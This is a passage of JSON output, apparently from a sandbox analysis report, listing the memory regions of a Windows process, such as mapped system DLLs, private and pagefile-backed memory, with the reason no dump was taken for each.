1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_4306", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:32.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_4307", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:32.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_4308", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:32.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_4309", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:32.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_4310", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:32.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_4311", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:32.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4312", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:32.935", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_4313", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:32.935", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_4314", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:32.935", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_4315", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:01:32.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_4316", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:32.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_4317", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:32.940", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_4318", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:32.940", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_4319", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:32.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_4320", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:32.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_4321", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:32.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4322", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:32.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_4323", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:32.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_4324", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:01:32.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 6815743, "entry_point": 0, "filename": null, "id": "region_4325", "name": "private_0x0000000000580000", "norm_filename": null, "region_type": "private_memory", "start_va": 5767168, "timestamp": "00:01:32.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1783758848, "type": "region", "version": 1 }, "end_va": 1784721407, "entry_point": 1783763918, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_4326", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1783758848, "timestamp": "00:01:32.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_4327", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:32.970", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_4328", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:32.970", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_4329", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:32.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1958936576, "type": "region", "version": 1 }, "end_va": 1958998015, "entry_point": 1958941345, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_4330", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1958936576, "timestamp": "00:01:32.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1959067648, "type": "region", "version": 1 }, "end_va": 1959284735, "entry_point": 1959072725, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_4331", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1959067648, "timestamp": "00:01:32.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1959329792, "type": "region", "version": 1 }, "end_va": 1959366655, "entry_point": 1959335334, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_4332", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1959329792, "timestamp": "00:01:32.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1959395328, "type": "region", "version": 1 }, "end_va": 1959464959, "entry_point": 1959400192, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_4333", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959395328, "timestamp": "00:01:32.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1959526400, "type": "region", "version": 1 }, "end_va": 1959579647, "entry_point": 1959530976, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_4334", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959526400, "timestamp": "00:01:32.974", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_4335", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:32.975", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_4336", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:32.975", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_4337", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:32.976", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_4338", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:32.976", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_4339", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:32.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_4340", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:32.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_4341", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:32.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_4342", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:32.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_4343", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:32.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_4344", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:32.979", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_4345", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:32.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_4346", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:32.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_4347", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:32.981", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_4348", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:32.981", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_4349", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:32.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_4350", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:32.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_4351", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:32.983", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_4352", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:32.983", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_4353", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:32.984", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4354", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:32.984", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6815744, "type": "region", "version": 1 }, "end_va": 8421375, "entry_point": 0, "filename": null, "id": "region_4355", "name": "pagefile_0x0000000000680000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6815744, "timestamp": "00:01:33.036", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4356", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:33.036", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_4357", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:33.037", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_4358", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:33.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_4359", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:33.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 999423, "entry_point": 983040, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_4360", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:33.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_4361", "name": "private_0x0000000000100000", "norm_filename": null, "region_type": "private_memory", "start_va": 1048576, "timestamp": "00:01:33.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_4362", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:33.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 1441792, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_4363", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 1441792, "timestamp": "00:01:33.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_4364", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:01:33.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_4365", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:33.142", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", 